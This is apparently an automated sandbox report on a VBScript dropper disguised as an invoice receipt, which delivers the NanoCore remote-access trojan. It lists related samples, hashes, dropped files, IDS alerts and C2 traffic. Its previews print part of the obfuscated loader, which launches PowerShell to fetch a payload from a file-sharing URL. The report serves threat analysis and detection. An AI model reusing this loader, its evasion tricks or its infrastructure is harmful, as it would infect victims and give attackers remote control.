                      • 49.13.162.183
                      67d16a17f27f15cf21671ccb406e1e8b647aaf90c72c9.exeGet hashmaliciousBrowse
                      • 195.201.225.248
                      diagram-477.docGet hashmaliciousBrowse
                      • 136.243.74.161
                      diagram-477.docGet hashmaliciousBrowse
                      • 136.243.74.161
                      diagram-477.docGet hashmaliciousBrowse
                      • 136.243.74.161
                      4J1sKiGm0T.exeGet hashmaliciousBrowse
                      • 116.203.165.54
                      lB2RFTpyni.exeGet hashmaliciousBrowse
                      • 116.203.165.54
                      lgT2LzjZ6N.exeGet hashmaliciousBrowse
                      • 116.203.165.54
                      gmeqUPOV23.exeGet hashmaliciousBrowse
                      • 116.203.165.54
                      BqgOuMRaJ3.exeGet hashmaliciousBrowse
                      • 116.203.165.54
                      Invoice.xlsxGet hashmaliciousBrowse
                      • 136.243.159.53
                      vPzJQvH6Pg.exeGet hashmaliciousBrowse
                      • 195.201.225.248
                      #U65b0#U7684#U8b49#U66f8#U8868#U683c.pdf.exeGet hashmaliciousBrowse
                      • 136.243.159.53
                      9f60a157b1a91cc18125825a286baaf011e65b0808be4.exeGet hashmaliciousBrowse
                      • 195.201.225.248
                      PTPEUSPT DRINGENDE BESTELLUNG _876453,pdf.exeGet hashmaliciousBrowse
                      • 194.147.140.9
                      41-Items-invoice.vbsGet hashmaliciousBrowse
                      • 194.147.140.20
                      Confirmaci#U00f3n del pedido- No HD10103,pdf.exeGet hashmaliciousBrowse
                      • 194.147.140.9
                      SPT DRINGENDE BESTELLUNG _8764,pdf.exeGet hashmaliciousBrowse
                      • 194.147.140.9
                      8 Items invoice.vbsGet hashmaliciousBrowse
                      • 194.147.140.20
                      heimatec RFQ 4556_ DRINGEND,pdf.exeGet hashmaliciousBrowse
                      • 194.147.140.9
                      Confirmarea comenzii noi-4019,pdf.exeGet hashmaliciousBrowse
                      • 194.147.140.9
                      vuaXoDsazgGet hashmaliciousBrowse
                      • 194.147.142.145
                      dsMBH5SmxLGet hashmaliciousBrowse
                      • 194.147.142.145
                      YIupXk5F7bGet hashmaliciousBrowse
                      • 194.147.142.145
                      pvbuEVYCUBGet hashmaliciousBrowse
                      • 194.147.142.145
                      1jTsJsy5b8Get hashmaliciousBrowse
                      • 194.147.142.145
                      fpAHzxlGRnGet hashmaliciousBrowse
                      • 194.147.142.145
                      sV5aR2SUfW.exeGet hashmaliciousBrowse
                      • 194.147.142.230
                      qSN1mPnL52.exeGet hashmaliciousBrowse
                      • 194.147.142.230
                      PO20171118-COGRAL SPA.jarGet hashmaliciousBrowse
                      • 185.105.236.179
                      New Order_R4.jarGet hashmaliciousBrowse
                      • 185.105.236.179
                      CYzY9Pi2ny.exeGet hashmaliciousBrowse
                      • 194.147.142.230
                      l4w9e3daPT.exeGet hashmaliciousBrowse
                      • 194.147.142.230
                      QxhGQtPVT8.exeGet hashmaliciousBrowse
                      • 194.147.142.230

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      54328bd36c14bd82ddaa0c04b25ed9addiagram-129.docGet hashmaliciousBrowse
                      • 144.76.136.153
                      8aGRdeN1Be.exeGet hashmaliciousBrowse
                      • 144.76.136.153
                      QLMRTJS9RA.exeGet hashmaliciousBrowse
                      • 144.76.136.153
                      SecuriteInfo.com.W32.AIDetect.malware2.32348.exeGet hashmaliciousBrowse
                      • 144.76.136.153
                      diagram-477.docGet hashmaliciousBrowse
                      • 144.76.136.153
                      Rombat-0118PDF.exeGet hashmaliciousBrowse
                      • 144.76.136.153
                      CLLKFIJI_(9-13-2021).xlsx.vbsGet hashmaliciousBrowse
                      • 144.76.136.153
                      YyKMqtQcLMkGx.vbsGet hashmaliciousBrowse
                      • 144.76.136.153
                      Halkbank_Ekstre_20210913_074002_566345 pdf.exeGet hashmaliciousBrowse
                      • 144.76.136.153
                      Kopie dokladu o transakci 09_14_21.exeGet hashmaliciousBrowse
                      • 144.76.136.153
                      qashmhBw9u.exeGet hashmaliciousBrowse
                      • 144.76.136.153
                      setup_x86_x64_install.exeGet hashmaliciousBrowse
                      • 144.76.136.153
                      Quotation.exeGet hashmaliciousBrowse
                      • 144.76.136.153
                      PROJ-9560 - PACKING SLIP.exeGet hashmaliciousBrowse
                      • 144.76.136.153
                      41-Items-invoice.vbsGet hashmaliciousBrowse
                      • 144.76.136.153
                      12-items-receipt.vbsGet hashmaliciousBrowse
                      • 144.76.136.153
                      Halkbank_Ekstre_20210726_084931-069855PDF.exeGet hashmaliciousBrowse
                      • 144.76.136.153
                      Synaptics_Software.exeGet hashmaliciousBrowse
                      • 144.76.136.153
                      Synaptics_Software.exeGet hashmaliciousBrowse
                      • 144.76.136.153
                      8 Items invoice.vbsGet hashmaliciousBrowse
                      • 144.76.136.153

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\Public\Run\New.vbs
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with very long lines, with CRLF line terminators
                      Category:dropped
                      Size (bytes):3098
                      Entropy (8bit):3.6634671005456276
                      Encrypted:false
                      SSDEEP:96:g4yyyyyyyyyyyyyyRyyyyyyyyyyyyyyjXWipjOyyyyyyyyyyy0lnmyyyyyyyyyyD:g4yyyyyyyyyyyyyyRyyyyyyyyyyyyyyB
                      MD5:B5C7FA9E05E183D03D904AE7ADF41DB6
                      SHA1:B7288229C407D23533AF9E7D420239356737F927
                      SHA-256:EFB3398CDC5BEFC7A4E7FFF22DB3C53B8BDDA4A815DD30ECA144B481150FA18F
                      SHA-512:D206F6B96525411B530ACE909182FFF98526B4942F2863429C6021339AD265E1B0667E13753FD45A82E593E78A41F02EBD716AD95B3C02ACD0B217897E6E6F60
                      Malicious:false
                      Yara Hits:
                      • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: C:\Users\Public\Run\New.vbs, Author: Florian Roth
                      Reputation:low
                      Preview: Set H = CreateObject("WScript.She"&"ll")..H1 = "POwerSheLL "..H2 = "$SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/yBhJOe/bbhyuH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-
                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):57895
                      Entropy (8bit):5.07724879463521
                      Encrypted:false
                      SSDEEP:1536:vvI+z30kaAxV3CNBQkj25h4iUxvaV7flJnVv6H15qdpnUSlQOdBQNUzktAHkbNK3:nI+z30NAxV3CNBQkj25qiUvaV7flJnV/
                      MD5:ABF0CA1055207E755309961A7F660E0D
                      SHA1:F886C56CCD77C17EBE81C8BFBFFCC42CBC614458
                      SHA-256:F2161823E2B5F73BBD5C674EA1E610A412370E87E23377B9DB1E6451F5417139
                      SHA-512:3535DB5640324B1E39616B23F30BE723F16446E5747A5FEC69F8090C0EDEE489E129BA9C6CC1EB5E290620570DFABC73F1CF116042B006BD692F7671A078D4CC
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview: PSMODULECACHE.X..........I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1L.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-SmbBandwidthLimit........Get-SmbClientConfiguration........Get-SmbSession........Get-Sm
                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):1204
                      Entropy (8bit):5.327588920450071
                      Encrypted:false
                      SSDEEP:24:3ULPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJP+qn:oPerB4nqRL/HvFe9t4Cv94aP+qn
                      MD5:B2E8F5B1D2CA14F416C34A1D80229547
                      SHA1:25427AFC9715DC9C34187C211788E2409C83FA48
                      SHA-256:A0B23D2B06F072A75AE6E5182F3776207E9EB012C568F11A10E5EE55F1F7FD03
                      SHA-512:D3E88A11415A981DD475ABB03BD2B1DAAA264FED387D1D6157317986CEC9FB813285EBCE2DEE4079A01EB929498B1D587482E8C05EF467D0796662369AC68AC0
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1v5ek2z.pme.ps1
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview: 1
                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_shxq4x4f.yut.psm1
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview: 1
                      C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):1856
                      Entropy (8bit):7.089541637477408
                      Encrypted:false
                      SSDEEP:48:IknjhUknjhUknjhUknjhUknjhUknjhUknjhUknjhL:HjhDjhDjhDjhDjhDjhDjhDjhL
                      MD5:30D23CC577A89146961915B57F408623
                      SHA1:9B5709D6081D8E0A570511E6E0AAE96FA041964F
                      SHA-256:E2130A72E55193D402B5F43F7F3584ECF6B423F8EC4B1B1B69AD693C7E0E5A9E
                      SHA-512:2D5C5747FD04F8326C2CC1FB313925070BC01D3352AFA6C36C167B72757A15F58B6263D96BD606338DA055812E69DDB628A6E18D64DD59697C2F42D1C58CC687
                      Malicious:false
                      Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.
                      C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                      File Type:ISO-8859 text, with NEL line terminators
                      Category:dropped
                      Size (bytes):8
                      Entropy (8bit):3.0
                      Encrypted:false
                      SSDEEP:3:M:M
                      MD5:1F780323C27D671F2B0ED27654FE168B
                      SHA1:FF6934AA961DA6B526FEACB5980E4290B401510E
                      SHA-256:7B3B3DB8E52C92BF7FBA5BCFC1A1E086346B4E7CA20696CACFD362832E57DF3F
                      SHA-512:B772484385C0698A12EF25BED47EE965DFBC3515D67E3C08E07B6CF4F0CD3D9772AAD6E10E028035AAE04776BFFBB3F11A6350FEE0F7438486712FCA4C5CF047
                      Malicious:true
                      Preview: #A...w.H
                      C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin
                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):40
                      Entropy (8bit):5.153055907333276
                      Encrypted:false
                      SSDEEP:3:9bzY6oRDT6P2bfVn1:RzWDT621
                      MD5:4E5E92E2369688041CC82EF9650EDED2
                      SHA1:15E44F2F3194EE232B44E9684163B6F66472C862
                      SHA-256:F8098A6290118F2944B9E7C842BD014377D45844379F863B00D54515A8A64B48
                      SHA-512:1B368018907A3BC30421FDA2C935B39DC9073B9B1248881E70AD48EDB6CAA256070C1A90B97B0F64BBE61E316DBB8D5B2EC8DBABCD0B0B2999AB50B933671ECB
                      Malicious:false
                      Preview: 9iH...}Z.4..f.~a........~.~.......3.U.
                      C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat
                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):327768
                      Entropy (8bit):7.999367066417797
                      Encrypted:true
                      SSDEEP:6144:oX44S90aTiB66x3PlZmqze1d1wI8lkWmtjJ/3Exi:LkjbU7LjGxi
                      MD5:2E52F446105FBF828E63CF808B721F9C
                      SHA1:5330E54F238F46DC04C1AC62B051DB4FCD7416FB
                      SHA-256:2F7479AA2661BD259747BC89106031C11B3A3F79F12190E7F19F5DF65B7C15C8
                      SHA-512:C08BA0E3315E2314ECBEF38722DF834C2CB8412446A9A310F41A8F83B4AC5984FCC1B26A1D8B0D58A730FDBDD885714854BDFD04DCDF7F582FC125F552D5C3CA
                      Malicious:false
                      Preview: pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.)*.....{B.[...y%.*..i.Q.<..xt.X..H.. ..HF7g...I.*3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^*I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.|i4...i...;O...n.?.,. ....v?.5}.OY@.dG|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`|.B....3.....I..o...u1..8i=.z.W..7
                      C:\Users\user\Documents\20210914\PowerShell_transcript.216554._wn6yr8Z.20210914161711.txt
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                      Category:dropped
                      Size (bytes):12052
                      Entropy (8bit):4.435371074103901
                      Encrypted:false
                      SSDEEP:192:U4yyyyyyyyyyyyyyRyyyyyyyyyyyyyyjXWi8yyyyyyyyyyyAnmyyyyyyyyyyyim5:NX+amXKX+amX3X+amX0vyGLGLwR
                      MD5:848F5DC8EBA565D6793F299F64555FBE
                      SHA1:83A26AAA973D3F2D4258605F691B899C7F470944
                      SHA-256:91B1FDA0F2E1FC8E953D5626922FD693DE90C7263A16E91F8F4D7EB7435427CB
                      SHA-512:34CAB2940E1E77E67594968C92AF4DFA2AB54EA9EB4E5CAE0EAD5CD34A199B0222923E41E3F3122E9A63F16D91393AEC4033D9010C901D84011E1EF9E27D89FC
                      Malicious:false
                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210914161712..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216554 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/PeIb5p/ffrtgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-

                      Static File Info

                      General

                      File type:ASCII text, with very long lines, with CRLF line terminators
                      Entropy (8bit):3.656750515589535
                      TrID:
                        File name:16 Items receipt.vbs
                        File size:3096
                        MD5:373e8c4787077ca8568bbe9a9508f9ef
                        SHA1:fa5913ab89e08bc5aadf1da9c5765a94fe7a5f77
                        SHA256:0c962d7d9bf5e6ddab50449102e1d549f8133fd09067a036982d19a76ab28499
                        SHA512:86144ec7545af0676349769e73714e2d3b4e030d82e8d1f4194864e7cc89cd600a763bdbc5a7bd87a83af1221b40f75527c91042749ee7b17050e49fca22e697
                        SSDEEP:96:b4yyyyyyyyyyyyyyRyyyyyyyyyyyyyyjXWipjOyyyyyyyyyyy0lnmyyyyyyyyyyK:b4yyyyyyyyyyyyyyRyyyyyyyyyyyyyyM
                        File Content Preview:Set H = CreateObject("WScript.She"&"ll")..H1 = "POwerSheLL "..H2 = "$SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/PeIb5p/ffrtgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-

                        File Icon

                        Icon Hash:e8d69ece869a9ec4

                        Network Behavior

                        Snort IDS Alerts

                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        09/14/21-16:18:27.933106UDP254DNS SPOOF query response with TTL of 1 min. and no authority53504638.8.8.8192.168.2.5
                        09/14/21-16:18:28.247148TCP2025019ET TROJAN Possible NanoCore C2 60B497916700192.168.2.5194.147.140.20
                        09/14/21-16:18:35.970141UDP254DNS SPOOF query response with TTL of 1 min. and no authority53503948.8.8.8192.168.2.5
                        09/14/21-16:18:36.197806TCP2025019ET TROJAN Possible NanoCore C2 60B497926700192.168.2.5194.147.140.20
                        09/14/21-16:18:43.322991UDP254DNS SPOOF query response with TTL of 1 min. and no authority53585308.8.8.8192.168.2.5
                        09/14/21-16:18:43.528811TCP2025019ET TROJAN Possible NanoCore C2 60B497936700192.168.2.5194.147.140.20
                        09/14/21-16:18:50.397813TCP2025019ET TROJAN Possible NanoCore C2 60B497946700192.168.2.5194.147.140.20
                        09/14/21-16:18:57.341714UDP254DNS SPOOF query response with TTL of 1 min. and no authority53544508.8.8.8192.168.2.5
                        09/14/21-16:18:57.538714TCP2025019ET TROJAN Possible NanoCore C2 60B497996700192.168.2.5194.147.140.20
                        09/14/21-16:19:04.457339UDP254DNS SPOOF query response with TTL of 1 min. and no authority53592618.8.8.8192.168.2.5
                        09/14/21-16:19:04.650544TCP2025019ET TROJAN Possible NanoCore C2 60B498006700192.168.2.5194.147.140.20
                        09/14/21-16:19:11.640310TCP2025019ET TROJAN Possible NanoCore C2 60B498016700192.168.2.5194.147.140.20
                        09/14/21-16:19:18.723485TCP2025019ET TROJAN Possible NanoCore C2 60B498026700192.168.2.5194.147.140.20
                        09/14/21-16:19:25.641249UDP254DNS SPOOF query response with TTL of 1 min. and no authority53605168.8.8.8192.168.2.5
                        09/14/21-16:19:25.839931TCP2025019ET TROJAN Possible NanoCore C2 60B498036700192.168.2.5194.147.140.20
                        09/14/21-16:19:32.929860UDP254DNS SPOOF query response with TTL of 1 min. and no authority53516498.8.8.8192.168.2.5
                        09/14/21-16:19:33.156696TCP2025019ET TROJAN Possible NanoCore C2 60B498046700192.168.2.5194.147.140.20
                        09/14/21-16:19:42.588765TCP2025019ET TROJAN Possible NanoCore C2 60B498096700192.168.2.5194.147.140.20
                        09/14/21-16:19:48.768012TCP2025019ET TROJAN Possible NanoCore C2 60B498166700192.168.2.5194.147.140.20
                        09/14/21-16:19:56.417550UDP254DNS SPOOF query response with TTL of 1 min. and no authority53643628.8.8.8192.168.2.5
                        09/14/21-16:19:56.660784TCP2025019ET TROJAN Possible NanoCore C2 60B498176700192.168.2.5194.147.140.20
                        09/14/21-16:20:03.340787TCP2025019ET TROJAN Possible NanoCore C2 60B498186700192.168.2.5194.147.140.20
                        09/14/21-16:20:10.183966TCP2025019ET TROJAN Possible NanoCore C2 60B498196700192.168.2.5194.147.140.20
                        09/14/21-16:20:16.867277TCP2025019ET TROJAN Possible NanoCore C2 60B498206700192.168.2.5194.147.140.20
                        09/14/21-16:20:23.831912UDP254DNS SPOOF query response with TTL of 1 min. and no authority53581998.8.8.8192.168.2.5
                        09/14/21-16:20:24.026916TCP2025019ET TROJAN Possible NanoCore C2 60B498216700192.168.2.5194.147.140.20
                        09/14/21-16:20:30.963837UDP254DNS SPOOF query response with TTL of 1 min. and no authority53652218.8.8.8192.168.2.5
                        09/14/21-16:20:31.155736TCP2025019ET TROJAN Possible NanoCore C2 60B498226700192.168.2.5194.147.140.20
                        09/14/21-16:20:38.229466TCP2025019ET TROJAN Possible NanoCore C2 60B498236700192.168.2.5194.147.140.20
                        09/14/21-16:20:45.151996UDP254DNS SPOOF query response with TTL of 1 min. and no authority53565628.8.8.8192.168.2.5
                        09/14/21-16:20:45.345283TCP2025019ET TROJAN Possible NanoCore C2 60B498246700192.168.2.5194.147.140.20
                        09/14/21-16:20:52.229116TCP2025019ET TROJAN Possible NanoCore C2 60B498256700192.168.2.5194.147.140.20
                        09/14/21-16:20:59.130908UDP254DNS SPOOF query response with TTL of 1 min. and no authority53596888.8.8.8192.168.2.5
                        09/14/21-16:20:59.326515TCP2025019ET TROJAN Possible NanoCore C2 60B498266700192.168.2.5194.147.140.20
                        09/14/21-16:21:06.252588TCP2025019ET TROJAN Possible NanoCore C2 60B498276700192.168.2.5194.147.140.20
                        09/14/21-16:21:13.410303TCP2025019ET TROJAN Possible NanoCore C2 60B498286700192.168.2.5194.147.140.20

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Sep 14, 2021 16:17:23.598725080 CEST49753443192.168.2.5144.76.136.153
                        Sep 14, 2021 16:17:23.598748922 CEST44349753144.76.136.153192.168.2.5
                        Sep 14, 2021 16:17:23.598841906 CEST49753443192.168.2.5144.76.136.153
                        Sep 14, 2021 16:17:23.620026112 CEST49753443192.168.2.5144.76.136.153
                        Sep 14, 2021 16:17:23.620038033 CEST44349753144.76.136.153192.168.2.5
                        Sep 14, 2021 16:17:23.707739115 CEST44349753144.76.136.153192.168.2.5
                        Sep 14, 2021 16:17:23.707896948 CEST49753443192.168.2.5144.76.136.153
                        Sep 14, 2021 16:17:23.711942911 CEST49753443192.168.2.5144.76.136.153
                        Sep 14, 2021 16:17:23.711950064 CEST44349753144.76.136.153192.168.2.5
                        Sep 14, 2021 16:17:23.712194920 CEST44349753144.76.136.153192.168.2.5
                        Sep 14, 2021 16:17:23.753524065 CEST49753443192.168.2.5144.76.136.153
                        Sep 14, 2021 16:17:23.799124956 CEST44349753144.76.136.153192.168.2.5
                        Sep 14, 2021 16:17:24.564598083 CEST44349753144.76.136.153192.168.2.5
                        Sep 14, 2021 16:17:24.564662933 CEST44349753144.76.136.153192.168.2.5
                        Sep 14, 2021 16:17:24.587148905 CEST44349753144.76.136.153192.168.2.5
                        Sep 14, 2021 16:17:24.588738918 CEST44349753144.76.136.153192.168.2.5
                        Sep 14, 2021 16:17:24.590581894 CEST44349753144.76.136.153192.168.2.5
                        Sep 14, 2021 16:17:24.590600014 CEST44349753144.76.136.153192.168.2.5
                        Sep 14, 2021 16:17:24.599981070 CEST49753443192.168.2.5144.76.136.153
                        Sep 14, 2021 16:17:24.600022078 CEST44349753144.76.136.153192.168.2.5
                        Sep 14, 2021 16:17:24.600132942 CEST49753443192.168.2.5144.76.136.153
                        Sep 14, 2021 16:17:24.608918905 CEST49753443192.168.2.5144.76.136.153
                        Sep 14, 2021 16:17:55.837855101 CEST49756443192.168.2.5144.76.136.153
                        Sep 14, 2021 16:17:55.837893963 CEST44349756144.76.136.153192.168.2.5
                        Sep 14, 2021 16:17:55.837979078 CEST49756443192.168.2.5144.76.136.153
                        Sep 14, 2021 16:17:55.838366032 CEST49756443192.168.2.5144.76.136.153
                        Sep 14, 2021 16:17:55.838385105 CEST44349756144.76.136.153192.168.2.5
                        Sep 14, 2021 16:17:55.900587082 CEST44349756144.76.136.153192.168.2.5
                        Sep 14, 2021 16:17:55.902926922 CEST49756443192.168.2.5144.76.136.153
